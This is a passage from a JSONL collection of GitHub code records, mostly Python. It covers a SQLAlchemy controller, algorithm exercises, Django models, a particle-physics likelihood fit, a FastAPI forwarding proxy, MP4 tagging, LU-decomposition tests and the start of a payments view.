45.py","file_name":"Problem 45.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"38796967324","text":"from sqlalchemy.orm import session\n\nfrom app.entities.scope_entity import ScopeEntity\nfrom app.exceptions.exceptions import ScopeAlreadyExistsException, ScopeNotFoundException\n\n\nclass ScopeController:\n def __init__(self, db_session: session = None):\n self.db_session = db_session\n\n def get_scope_by_id(self, scope_id):\n \"\"\"Get scope by scope id\"\"\"\n\n scope = self.db_session.query(ScopeEntity).filter_by(scope_id=scope_id).first()\n if not scope:\n raise ScopeNotFoundException(scope_id)\n\n return scope.to_dict()\n\n def get_scope_by_name(self, scope_name):\n \"\"\"Get scope by scope name\"\"\"\n\n scope = self.db_session.query(ScopeEntity).filter_by(name=scope_name).first()\n if not scope:\n raise ScopeNotFoundException(scope_name)\n\n return scope.to_dict()\n\n def create_scope(self, new_scope: ScopeEntity):\n \"\"\"Storage new_scope in database\"\"\"\n\n scope = self.db_session.query(ScopeEntity).filter_by(name=new_scope.name).first()\n if scope:\n raise ScopeAlreadyExistsException(scope.name)\n\n self.db_session.add(new_scope)\n self.db_session.commit()\n\n return new_scope.to_dict()\n","repo_name":"ganzola/ambrosia-hades-api","sub_path":"app/controllers/scope_controller.py","file_name":"scope_controller.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26790238335","text":"# Q. Count the number of unique paths from the top left to the bottom right. You are only allowed to move down or to the right.\n\n# Time complexity: O(2 ^ (n + m))\ndef brute_force(r, c, rows, cols):\n if r == rows or c == cols:\n return 0\n\n if r == rows - 1 and c == cols - 1:\n return 1\n\n return (brute_force(r+1, c, rows, cols) +\n brute_force(r, c+1, rows, cols))\n\n\nprint(brute_force(0, 0, 4, 4))\n\n\n# Memoization - Time complexity: O(n * m)\n\ndef memoization(r, c, rows, cols, cache):\n if r == rows or c == cols:\n return 0\n if cache[r][c] > 0:\n return cache[r][c]\n if r == rows - 1 and c == cols - 1:\n return 1\n\n cache[r][c] = (memoization(r+1, c, rows, cols, cache) +\n memoization(r, c+1, rows, cols, cache))\n\n return cache[r][c]\n\n\nprint(memoization(0, 0, 4, 4, [[0]*4 for i in range(4)]))\n\n\n# Dynamic Programming - Time: O(n * m), Space: O(m), where m is num of cols\ndef dp(rows, cols):\n prevRow = [0] * cols\n\n for r in range(rows - 1, -1, -1):\n curRow = [0] * cols\n curRow[cols - 1] = 1\n for c in range(cols - 2, -1, -1):\n curRow[c] = curRow[c + 1] + prevRow[c]\n prevRow = curRow\n return prevRow[0]\n\n\nprint(dp(4, 4))\n","repo_name":"Paulvitalis200/Data-Structures","sub_path":"DynamicProgramming/two_dp.py","file_name":"two_dp.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41661728486","text":"import random\nimport string\nfrom datetime import timedelta, datetime\nfrom typing import Optional\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass _AutoCleanedModel(models.Model):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.is_cleaned = False\n\n class Meta:\n abstract = True\n\n def clean(self):\n self.is_cleaned = True\n super().clean()\n\n def save(self, *args, **kwargs):\n if not self.is_cleaned:\n self.full_clean()\n super().save(*args, **kwargs)\n\n\nclass Contactable(_AutoCleanedModel):\n \"\"\"\n Different ways of contacting someone is aggregated in this mixin.\n \"\"\"\n telegram_username = models.CharField(null=False, blank=True, default='', max_length=32)\n\n class Meta:\n abstract = True\n\n\nclass User(AbstractUser, Contactable):\n first_name = models.CharField(null=False, blank=True, default='', max_length=64)\n last_name = models.CharField(null=False, blank=True, default='', max_length=64)\n telegram_user_id = models.BigIntegerField(null=True, blank=True, unique=True)\n telegram_chat_id = models.BigIntegerField(null=True, blank=True)\n\n @staticmethod\n def generate_random_username() -> str:\n return ''.join(random.choice(string.ascii_letters) for i in range(64))\n\n\nclass TargetBot(Contactable):\n creator = models.ForeignKey(User, on_delete=models.CASCADE)\n\n class Meta:\n constraints = [\n # Should be checked differently whenever contact points other than Telegram are also supported.\n models.UniqueConstraint(fields=['creator', 'telegram_username'], name=\"duplicate_bot_preventer\")\n ]\n\n\nclass Alert(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n fixed_at = models.DateTimeField(null=True)\n target_bot = models.ForeignKey(TargetBot, on_delete=models.CASCADE)\n sent = models.BooleanField(default=False)\n\n def is_fixed(self) -> bool:\n return self.fixed_at is not None\n\n def has_passed_certainty_waiting_period(self, current_time: Optional[datetime] = None):\n \"\"\"\n Determines whether the alert is fully active (i.e. has waited for certainty period and has not fixed yet) or not.\n :param current_time: The current time to evaluate the alert age.\n :return: True if the alert age has passed the certainty waiting period (and hence should be informed). Otherwise False.\n \"\"\"\n return (current_time or timezone.now()) - self.created_at >= timedelta(seconds=settings.ALERT_CERTAINTY_WAIT_SECONDS)\n","repo_name":"emranbm/botmon","sub_path":"backend/main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22729266390","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom iminuit import Minuit\r\n\r\n\r\ndf = pd.read_pickle('data/total_dataset.pkl')\r\ndf = pd.read_pickle('data/sig.pkl')\r\n\r\nq2 = df['q2']\r\n\r\nbin_ranges = [[0.1, 0.98],\r\n [1.1, 2.5],\r\n [2.5, 4.0],\r\n [4.0, 6.0],\r\n [6.0, 8.0],\r\n [15.0,17.0],\r\n [17.0,19.0],\r\n [11.0, 12.5],\r\n [1.0,6.0],\r\n [15.0,17.9]]\r\n\r\nn = len(bin_ranges)\r\n\r\nbins = [[] for i in range(n)]\r\n\r\nfor i in range(n):\r\n bins[i] = df[(df['q2'] > bin_ranges[i][0]) & (df['q2'] < bin_ranges[i][1])]\r\n \r\n\r\n \r\n#%%\r\n\r\nbins[0].head()\r\n\r\nplt.hist(bins[3]['costhetal'], bins=25, density=True)\r\nplt.xlabel(r'$cos(\\theta_l)$')\r\nplt.ylabel(r'Number of candidates')\r\nplt.grid()\r\nplt.show()\r\n\r\n#%%\r\n\r\ndf = pd.read_pickle('data/total_dataset.pkl')\r\ndf = pd.read_pickle('data/sig.pkl')\r\ndf = pd.read_pickle('data/acceptance_mc.pkl')\r\n\r\nctl = df['costhetal']\r\nctk = df['costhetak']\r\nphi = df['phi']\r\nq2 = df['q2']\r\n\r\n\r\nplt.figure()\r\nn, bins1, patches = plt.hist(ctl, bins=25, density=True)\r\nbin_center = bins1[:-1] + np.diff(bins1) / 2\r\nfit_ctl = np.polynomial.legendre.Legendre.fit(bin_center, n, 4)\r\n\r\nplt.figure()\r\nn, bins1, patches = plt.hist(ctk, bins=25, density=True)\r\nbin_center = bins1[:-1] + np.diff(bins1) / 2\r\nfit_ctk = np.polynomial.legendre.Legendre.fit(bin_center, n, 5)\r\n\r\nplt.figure()\r\nn, bins1, patches = plt.hist(phi, bins=25, density=True)\r\nbin_center = bins1[:-1] + np.diff(bins1) / 2\r\nfit_phi = np.polynomial.legendre.Legendre.fit(bin_center, n, 6)\r\n\r\nplt.figure()\r\nn, bins1, patches = plt.hist(q2, bins=25, density=True)\r\nbin_center = bins1[:-1] + np.diff(bins1) / 2\r\nfit_q2 = np.polynomial.legendre.Legendre.fit(bin_center, n, 5)\r\n\r\n\r\nfrom sklearn import preprocessing\r\n\r\n#%%\r\n\r\n\r\ndef d2gamma_p_d2q2_dcostheta(fl, afb, cos_theta_l, cos_theta_k, phi):\r\n \"\"\"\r\n Returns the pdf defined above\r\n :param fl: f_l observable\r\n :param afb: a_fb observable\r\n :param cos_theta_l: cos(theta_l)\r\n :return:\r\n \"\"\"\r\n ctl = cos_theta_l\r\n ctk = cos_theta_k\r\n phi = phi\r\n c2tl = 2 * ctl ** 2 - 1\r\n #acceptance = fit_ctl(ctl) \r\n #acceptance = fit_ctl(ctl) * fit_ctk(ctk) * fit_phi(phi)\r\n #average = sum(acceptance) / len(acceptance)\r\n #acceptance /= average\r\n #acceptance = 1 / fit_ctl(ctl) \r\n #average = sum(acceptance) / len(acceptance)\r\n #acceptance *= average\r\n acceptance = 2\r\n\r\n scalar_array = 3/8 * (3/2 - 1/2 * fl + 1/2 * c2tl * (1 - 3 * fl) + 8/3 * afb * ctl) * acceptance\r\n normalised_scalar_array = scalar_array \r\n \r\n #normalised_scalar_array = normalised_scalar_array[0]\r\n return normalised_scalar_array\r\n\r\ndef log_likelihood(fl, afb, _bin):\r\n \"\"\"\r\n Returns the negative log-likelihood of the pdf defined above\r\n :param fl: f_l observable\r\n :param afb: a_fb observable\r\n :param _bin: number of the bin to fit\r\n :return:\r\n \"\"\"\r\n _bin = bins[int(_bin)]\r\n ctl = _bin['costhetal']\r\n ctk = _bin['costhetak']\r\n phi = _bin['phi']\r\n normalised_scalar_array = d2gamma_p_d2q2_dcostheta(fl=fl, afb=afb, cos_theta_l=ctl, cos_theta_k=ctk, phi=phi)\r\n return - np.sum(np.log(normalised_scalar_array))\r\n\r\n#%%\r\n\r\n\r\n#%%\r\n\r\n_test_bin = 1\r\n_test_afb = 0.7\r\n_test_fl = 0.0\r\n\r\nx = np.linspace(-1, 1, 500)\r\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 3))\r\nax1.plot(x, [log_likelihood(fl=i, afb=_test_afb, _bin=_test_bin) for i in x])\r\nax1.set_title(r'$A_{FB}$ = ' + str(_test_afb))\r\nax1.set_xlabel(r'$F_L$')\r\nax1.set_ylabel(r'$-\\mathcal{L}$')\r\nax1.grid()\r\nax2.plot(x, [log_likelihood(fl=_test_fl, afb=i, _bin=_test_bin) for i in x])\r\nax2.set_title(r'$F_{L}$ = ' + str(_test_fl))\r\nax2.set_xlabel(r'$A_{FB}$')\r\nax2.set_ylabel(r'$-\\mathcal{L}$')\r\nax2.grid()\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n#%%\r\n\r\nbin_number_to_check = 0 # bin that we want to check in more details in the next cell\r\nbin_results_to_check = None\r\n\r\nlog_likelihood.errordef = Minuit.LIKELIHOOD\r\ndecimal_places = 3\r\nstarting_point = [-0.1,0.0]\r\nfls, fl_errs = [], []\r\nafbs, afb_errs = [], []\r\nfor i in range(len(bins)):\r\n m = Minuit(log_likelihood, fl=starting_point[0], afb=starting_point[1], _bin=i)\r\n m.fixed['_bin'] = True # fixing the bin number as we don't want to optimize it\r\n m.limits=((-1.0, 1.0), (-1.0, 1.0), None)\r\n m.migrad()\r\n m.hesse()\r\n if i == bin_number_to_check:\r\n bin_results_to_check = m\r\n fls.append(m.values[0])\r\n afbs.append(m.values[1])\r\n fl_errs.append(m.errors[0])\r\n afb_errs.append(m.errors[1])\r\n print(f\"Bin {i}: {np.round(fls[i], decimal_places)} pm {np.round(fl_errs[i], decimal_places)},\", f\"{np.round(afbs[i], decimal_places)} pm {np.round(afb_errs[i], decimal_places)}. Function minimum considered valid: {m.fmin.is_valid}\")\r\n \r\n \r\n#%%\r\n\r\n\r\nplt.figure(figsize=(8, 5))\r\nplt.subplot(221)\r\nbin_results_to_check.draw_mnprofile('afb', bound=3)\r\nplt.subplot(222)\r\nbin_results_to_check.draw_mnprofile('fl', bound=3)\r\n\r\n#%%\r\n'''\r\nbin_to_plot = 3\r\nnumber_of_bins_in_hist = 25\r\ncos_theta_l_bin = bins[bin_to_plot]['costhetal']\r\nhist, _bins, _ = plt.hist(cos_theta_l_bin, bins=number_of_bins_in_hist)\r\nx = np.linspace(-1, 1, number_of_bins_in_hist)\r\npdf_multiplier = np.sum(hist) * (np.max(cos_theta_l_bin) - np.min(cos_theta_l_bin)) / number_of_bins_in_hist\r\ny = d2gamma_p_d2q2_dcostheta(fl=fls[bin_to_plot], afb=afbs[bin_to_plot], cos_theta_l=x, cos_theta_k=x, phi=x) * pdf_multiplier\r\nplt.plot(x, y, label=f'Fit for bin {bin_to_plot}')\r\nplt.xlabel(r'$cos(\\theta_l)$')\r\nplt.ylabel(r'Number of candidates')\r\nplt.legend()\r\nplt.grid()\r\nplt.show()\r\nplt.tight_layout()\r\nplt.show()\r\n'''\r\n#%%\r\n\r\n\r\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(7, 3))\r\nax1.errorbar(np.linspace(0, len(bins) - 1, len(bins)), fls, yerr=fl_errs, fmt='o', markersize=2, label=r'$F_L$', color='red')\r\nax2.errorbar(np.linspace(0, len(bins) - 1, len(bins)), afbs, yerr=afb_errs, fmt='o', markersize=2, label=r'$A_{FB}$', color='red')\r\nax1.grid()\r\nax2.grid()\r\nax1.set_ylabel(r'$F_L$')\r\nax2.set_ylabel(r'$A_{FB}$')\r\nax1.set_xlabel(r'Bin number')\r\nax2.set_xlabel(r'Bin number')\r\nplt.tight_layout()\r\nplt.show()","repo_name":"ImperialTBPS3/Acceptance","sub_path":"skeletoncode_forsignaldata.py","file_name":"skeletoncode_forsignaldata.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21850413867","text":"import sys\ninput = sys.stdin.readline\n\ndef dfs(x, y, d):\n\n global answer\n\n if board[x][y] == 0:\n answer += 1\n board[x][y] = 2\n\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n\n flag = False\n\n for i in range(4):\n nd = (d+3) % 4\n nx = x + dx[nd]\n ny = y + dy[nd]\n if 0 <= nx < n and 0 <= ny < m:\n if board[nx][ny] == 0:\n flag = True\n dfs(nx, ny, nd)\n return\n d = nd\n\n if not flag:\n nd = (d + 2) % 4\n nx = x + dx[nd]\n ny = y + dy[nd]\n if 0 <= nx < n and 0 <= ny < m:\n if board[nx][ny] == 1:\n return\n dfs(nx, ny, d)\n\n\nn, m = map(int, input().split())\nr, c, d = map(int, input().split())\nboard = []\nanswer = 0\nfor _ in range(n):\n board.append(list(map(int, input().split())))\ndfs(r, c, d)\nprint(answer)\n\n\n","repo_name":"bhyun/daily-algorithm","sub_path":"2021/BOJ14503_로봇 청소기.py","file_name":"BOJ14503_로봇 청소기.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31756820369","text":"from fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\nimport requests\nimport os \nimport json\n\nip = os.getenv(\"redirectIp\")\n\naddress = 'http://' + ip + ':8000'\napp = FastAPI()\n\n\nclass Task(BaseModel):\n name: str\n description: str\n\n# /task\n@app.get(\"/task\")\nasync def get_task():\n a = requests.get(url = address + '/task')\n return a.json()\n\n@app.post(\"/task\")\nasync def post_task(task: Task):\n data = {\"name\": task.name, \"description\": task.description}\n requests.post(url = address + '/task', data = json.dumps(data))\n \n\n# /task/<id>\n@app.get(\"/task/{id}\")\nasync def get_task_id(id: str):\n a = requests.get(url = address + '/task/' + id )\n return a.json()\n\n@app.put(\"/task/{id}\")\nasync def put_task_id(id: str, task: Task):\n data = {\"name\": task.name, \"description\": task.description}\n a = requests.put(url = address + '/task/' + id, data = json.dumps(data) )\n \n \n@app.delete(\"/task/{id}\")\nasync def delete_task(id: str):\n a = requests.delete(url = address + '/task/' + id )\n\n# /healthcheck (only returns status 200)\n@app.get(\"/healthcheck\", status_code=200)\nasync def health_check():\n a = requests.get(url = address + '/healthcheck')","repo_name":"IagoMendes/CloudComputing","sub_path":"Project/redirect.py","file_name":"redirect.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11359790397","text":"from mutagen.mp4 import MP4, MP4Cover, error\n\nTEMPLATE_METADATA = {\n '\\xa9nam': ['Mice On Venus'], # track title\n '\\xa9ART': ['C418'], # album artist\n 'aART': ['C418'], # artist\n '\\xa9alb': ['Minecraft - Volume Alpha'], # album\n 'trkn': [(11, 24)], # track number / total\n '\\xa9day': ['2011'], # year\n 'covr': None\n}\n\n\ndef save_metadata(audio_filename, title, artist, album_artist, album, track, track_total, date, cover_filename):\n f = MP4(audio_filename)\n\n try:\n f.add_tags()\n except error:\n pass\n\n f['\\xa9nam'] = [title]\n f['\\xa9ART'] = [artist]\n f['aART'] = [album_artist]\n f['\\xa9alb'] = [album]\n f['trkn'] = [(track, track_total)]\n f['\\xa9day'] = [str(date)]\n\n with open(cover_filename, \"rb\") as cover_file:\n f[\"covr\"] = [\n MP4Cover(cover_file.read(), imageformat=MP4Cover.FORMAT_JPEG)\n ]\n\n f.save()\n","repo_name":"eloitanguy/yt_audio_downloader","sub_path":"metadata_handler.py","file_name":"metadata_handler.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24071369255","text":"import sys\nimport os\nimport warnings\nimport argparse\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom os.path import abspath, dirname\nsys.path.append(dirname(dirname(abspath(__file__))))\n\nfrom spherical_cnn import sphericalcof\n\nfrom spherical_cnn import datasets\n\ntry:\n import pyshtools\nexcept:\n pass\n\n\nfrom spherical_cnn import util\nfrom spherical_cnn.util import tf_config\nfrom spherical_cnn import models\n\n\nshape = 1\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')\nparser.add_argument('--dset_dir', default='/media/SSD/DATA/ayman/papers/spherical-cnn/data/test/', help=' datasers directory ')\nparser.add_argument('--order', '-or', type=int, default=16,help='order of coefficients')\nparser.add_argument('--nchannels', default=1, type=int, help='Number of input channels')\nparser.add_argument('--input_res', '-res', type=int, default=64,help='resolution for spherical inputs; may subsample if larger')\n# parser.add_argument('--n_classes', '-nc', type=int, default=40, help='number of classes in dataset')\n# parser.add_argument('--num_point', type=int, default=1024, help='Point Number [default: 1024]')\n\nparser.add_argument('--dset', '-d', type=str, default='from_cached_tfrecords', help='dataset loader')\nparser.add_argument('--logdir', '-ld', type=str, default='', help='directory to save models, logs and checkpoints.')\nparser.add_argument('--dtype',type=str, default='float32', )\nparser.add_argument('--train_bsize', type=int, default=1)\nparser.add_argument('spectral_input', action='store_false', default=False)\n\nargs = parser.parse_args()\n\nassert os.path.isdir(args.dset_dir)\n\ndset = datasets.load(args)\nindim = models.get_indim(args)\n# dsetarg = {'dset': dset}\n\n# read data\nx, y = util.tfrecord2np(dset[1]['fnames']['test'][0],\n indim,\n dtype=args.dtype)\nx= x/np.max(x)\n# X=(X>0)*1\n\n#choose record\n# for i in range(len(y)):\n# if y[i]==shape:\n# inputs = x[i]\n# break\n\n# x, y = util.tfrecord2np(dset[1]['fnames']['test'][0],\n# indim,\n# dtype=args.dtype)\ninputs = x[0]\ninputs_out = x[1]\n\n# choose centric sphere\n# input = inputs[...,8]\n# input_out = inputs_out[...,8]\n# if input.any()==0:\n# print('zero elements')\n# for i in range(3,10):\n# input = inputs[..., i]\n# input_out = inputs_out[..., i]\n# if input.any() != 0:\n# break\n\n# f = open('datain.txt', 'ab')\n# inp = np.array(x)\n#\n# for jj in range(7):\n# # f.write(str(inp[0,: ,:,jj]))\n# np.savetxt(f, inp[ 0, :, :, jj], fmt=\"%s\")\n# for jj in range(7):\n# np.savetxt(f, inp[ 1, :, :, jj], fmt=\"%s\")\n# f.close()\n\n\n\n# generate sh for resulotion res and a given order\n# sh = sphericalcof.sph_harm_all(args.input_res, order=args.input_res//4)\n\n# coeff= sphericalcof.sph_harm_transform(input, harmonics=sh,order=args.input_res//4)\ncoeff= sphericalcof.sph_harm_transform_batch(x, order=args.input_res//4)\ncoeff= tf.reshape(coeff, [2, -1])\nf = open('datainc.txt', 'ab')\ninp = np.array(x)\nnp.savetxt(f, inp[ 0, :])\nnp.savetxt(f, inp[ 1, :])\nf.close()\n\n\n\ncoeff_out= sphericalcof.sph_harm_transform(input_out, harmonics=sh,order=args.order)\n\ndef stack_uneven(arrays, fill_value=0.):\n '''\n Fits arrays into a single numpy array, even if they are\n different sizes. `fill_value` is the default value.\n\n Args:\n arrays: list of np arrays of various sizes\n (must be same rank, but not necessarily same size)\n fill_value (float, optional):\n\n Returns:\n np.ndarray\n '''\n # sizes = [np.shape(a) for a in arrays]\n results=[]\n # max_sizes = np.max(list(zip(*sizes)), -1)\n # The resultant array has stacked on the first dimension\n # result = np.full((len(arrays),) + tuple(max_sizes), fill_value)\n for i, a in enumerate(arrays):\n # The shape of this array `a`, turned into slices\n # slices = tuple(slice(0,s) for s in sizes[i])\n # Overwrite a block slice of `result` with this array `a`\n # result[i][slices] = a\n results = np.append(results, a)\n return results\n\n\ncoeff_s=stack_uneven(coeff)\ncoeff_outs=stack_uneven(coeff_out)\nnorm=coeff_outs/coeff_s\n\n# plot coeff\n# Prepare the data\ndegrees = np.linspace(0,args.order**2,args.order**2)\n# Plot the data\n# plt.plot(degrees,abs(coeff_s), label='clean')\n# plt.plot(degrees,abs(coeff_outs) , label='outliers')\n\nplt.plot(degrees,abs(norm) , label='norm')\n# Add a legend\nplt.legend()\n# Show the plot\nplt.show()\n\n# output= sphericalcof.sph_harm_inverse(coeff, res=args.input_res, harmonics=sh)\n\n","repo_name":"AymanMukh/R-SCNN","sub_path":"Image/test/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72194505747","text":"class WrongSummatorParametersException(Exception):\n def __init__(self):\n super(WrongSummatorParametersException, self).__init__(\n \"Summator's parameters is not vector or number\"\n )\n\n\nclass WrongSummatorVectorLengthsException(Exception):\n def __init__(self):\n super(WrongSummatorVectorLengthsException, self).__init__(\n \"Summator's vector parameters have different lengths\"\n )\n","repo_name":"kannabi/neural-bicycle","sub_path":"main/neuron/summators/array/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30892523305","text":"from cmt.a_converter import AConverter\nfrom cmt.cmap.v1 import *\nfrom cmt.cmap.v2 import *\nfrom cmt.ecmap.v4 import *\n\n\nclass Converter(AConverter):\n @staticmethod\n def convert(source: CMap_2) -> ECMap_4:\n ecmap = ECMap_4()\n ecmap.cmap = source\n ecmap.cmap.checkpoint_times = None\n return ecmap\n\n @staticmethod\n def downgrade(source: CMap_2) -> CMap_1:\n res = CMap_1()\n res.name = source.name\n res.checkpoint_times = source.checkpoint_times\n res.sun_rotation = source.sun_rotation_hor\n res.sun_angle = source.sun_rotation_ver\n res.camera_pos = source.camera_pos\n res.camera_look = source.camera_look\n\n for ent in source.entities:\n new_ent = None\n if type(ent) == Block_2:\n new_ent = Block_1()\n new_ent.block_type = ent.block_type\n new_ent.position = (int(ent.position[0]), int(ent.position[1]), int(ent.position[2]))\n new_ent.scale = (int(ent.scale[0]), int(ent.scale[1]), int(ent.scale[2]))\n new_ent.rotation_z = ent.rotation_z\n new_ent.checkpoint_nr = ent.checkpoint_nr\n new_ent.byte_size = ent.byte_size\n elif type(ent) == Sphere_2:\n new_ent = Sphere_1()\n new_ent.position = (int(ent.position[0]), int(ent.position[1]), int(ent.position[2]))\n elif type(ent) == PlayerStart_2:\n new_ent = PlayerStart_1()\n new_ent.position = (int(ent.position[0]), int(ent.position[1]), int(ent.position[2]))\n new_ent.rotation_z = ent.rotation_z\n elif type(ent) == Dummy_2:\n new_ent = Dummy_1()\n new_ent.id = ent.id\n new_ent.position = (int(ent.position[0]), int(ent.position[1]), int(ent.position[2]))\n new_ent.scale = (int(ent.scale[0]), int(ent.scale[1]), int(ent.scale[2]))\n new_ent.rotation_z = ent.rotation_z\n if new_ent is not None:\n res.entities.append(new_ent)\n return res\n\n @staticmethod\n def upgrade(source: CMap_2) -> 'CMap_3':\n raise ValueError(\n f\"Upgrading {source.identifier.name} {source.format_version} to\"\n f\" {source.identifier.name} {source.format_version + 1} is not supported.\"\n )\n","repo_name":"IceflowRE/cmt","sub_path":"cmt/converter/cmap_v2.py","file_name":"cmap_v2.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14266905827","text":"import os\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nhost = socket.gethostname() # Get local machine name\nport = 1233\n\ns.bind((host, port))\ns.listen(5)\n\n\nclient_socket, address = s.accept()\nprint(\"Conencted to - \", address, \"\\n\")\n\ndata = client_socket.recv(2048)\ndec = data.decode('utf8')\n#my_bytes = bytearray(data)\nprint(dec)\n\n\nprint(\"The following data was received - \", data)\n","repo_name":"ramosrafh/CD","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33002322591","text":"\nfrom numba import jit\nimport numpy as np\nfrom numpy.testing import assert_array_almost_equal\nfrom pytest import mark\n\nfrom .doolittle import lu_decomp\nfrom .lu_smorgasbord import (\n lu_0, lu_1, lu_2, lu_3, lu_4, lu_5,\n lu_parallel, lu_parallel_2\n)\nfrom .lu_c_fortran import lu_decomp_c_fortran\n\nSERIAL_FNS = [lu_decomp, lu_0, lu_1, lu_2, lu_3, lu_4, lu_5, lu_decomp_c_fortran]\nPARALLEL_FNS = [lu_parallel, lu_parallel_2]\nALL_FNS = SERIAL_FNS + PARALLEL_FNS\n\n\n@mark.parametrize('fn', ALL_FNS, ids=lambda f: f.__name__)\ndef test_doolittle_geeks_for_geeks(fn):\n \"\"\"\n This example is taken from the geeks for geeks\n website:\n https://www.geeksforgeeks.org/doolittle-algorithm-lu-decomposition/\n \"\"\"\n arr = np.array([\n [2, -1, -2],\n [-4, 6, 3],\n [-4, -2, 8]\n ])\n\n lower, upper = fn(arr)\n\n # basic sanity\n final = lower @ upper\n assert_array_almost_equal(final, arr)\n\n expected_lower = np.array([\n [ 1., 0., 0.],\n [-2., 1., 0.],\n [-2., -1., 1.],\n ])\n assert_array_almost_equal(expected_lower, lower)\n\n expected_upper = np.array([\n [2., -1., -2.],\n [0., 4., -1.],\n [0., 0., 3.]\n ])\n assert_array_almost_equal(upper, expected_upper)\n\n\n@mark.parametrize('fn', ALL_FNS, ids=lambda f: f.__name__)\ndef test_doolittle_chapter_7(fn):\n \"\"\" This example comes from the PDF of chapter 7:\n www.math.iit.edu/~fass/477577_Chapter_7.pdf\n\n also found in lu_decomp/literature\n \"\"\"\n arr = np.array([\n [1, 1, 1],\n [2, 3, 5],\n [4, 6, 8]\n ])\n\n lower, upper = fn(arr)\n\n assert_array_almost_equal(lower @ upper, arr)\n\n expected_lower = np.array([\n [1, 0, 0],\n [2, 1, 0],\n [4, 2, 1]\n ])\n\n assert_array_almost_equal(expected_lower, lower)\n\n expected_upper = np.array([\n [1, 1, 1],\n [0, 1, 3],\n [0, 0, -2]\n ])\n\n assert_array_almost_equal(expected_upper, upper)\n\n\n@mark.parametrize('fn', ALL_FNS, ids=lambda f: f.__name__)\ndef test_doolittle_ust_hk(fn):\n \"\"\" This is the example from Ch06 UST HK:\n https://www.math.ust.hk/~mamu/courses/231/Slides/CH06_5A.pdf\n\n also in literature/CH06_5A.pdf\n \"\"\"\n arr = np.array([\n [1, 1, 0, 3],\n [2, 1, -1, 1],\n [3, -1, -1, 2],\n [-1, 2, 3 , -1]\n ])\n\n lower, upper = fn(arr)\n\n assert_array_almost_equal(lower @ upper, arr)\n\n expected_lower = np.array([\n [1, 0, 0, 0],\n [2, 1, 0, 0],\n [3, 4, 1, 0],\n [-1, -3, 0, 1]\n ])\n\n assert_array_almost_equal(expected_lower, lower)\n\n expected_upper = np.array([\n [1, 1, 0, 3],\n [0, -1, -1, -5],\n [0, 0, 3, 13],\n [0, 0, 0, -13]\n ])\n\n assert_array_almost_equal(expected_upper, upper)\n\n\n@mark.parametrize('fn', SERIAL_FNS, ids=lambda f: f.__name__)\ndef test_lu_decomp_heavy(fn):\n arr = np.random.random((500, 500))\n lower, upper = jit(fn)(arr)\n assert_array_almost_equal(lower @ upper, arr)\n\n\n@mark.parametrize('fn', PARALLEL_FNS, ids=lambda f: f.__name__)\ndef test_lu_decomp_heavy_parallel(fn):\n arr = np.random.random((500, 500))\n lower, upper = fn(arr)\n assert_array_almost_equal(lower @ upper, arr)\n\n\nif __name__ == '__main__':\n import pytest\n pytest.main([__file__])\n","repo_name":"fastats/learning","sub_path":"performance/2017_12_LU_decomposition/python/test_doolittle.py","file_name":"test_doolittle.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1345396670","text":"from decimal import Decimal\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.template.response import TemplateResponse\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import View\nfrom payments import RedirectNeeded, get_payment_model\nfrom plans.models import Order\n\n\nclass PaymentDetailView(LoginRequiredMixin, View):\n login_url = reverse_lazy(\"auth_login\")\n template_name = \"plans_payments/payment.html\"\n\n def get(self, request, *args, payment_id=None):\n payment = get_object_or_404(\n get_payment_model(), order__user=request.user, id=payment_id\n )\n try:\n form = payment.get_form(data=request.POST or None)\n except RedirectNeeded as redirect_to:\n payment.save()\n return 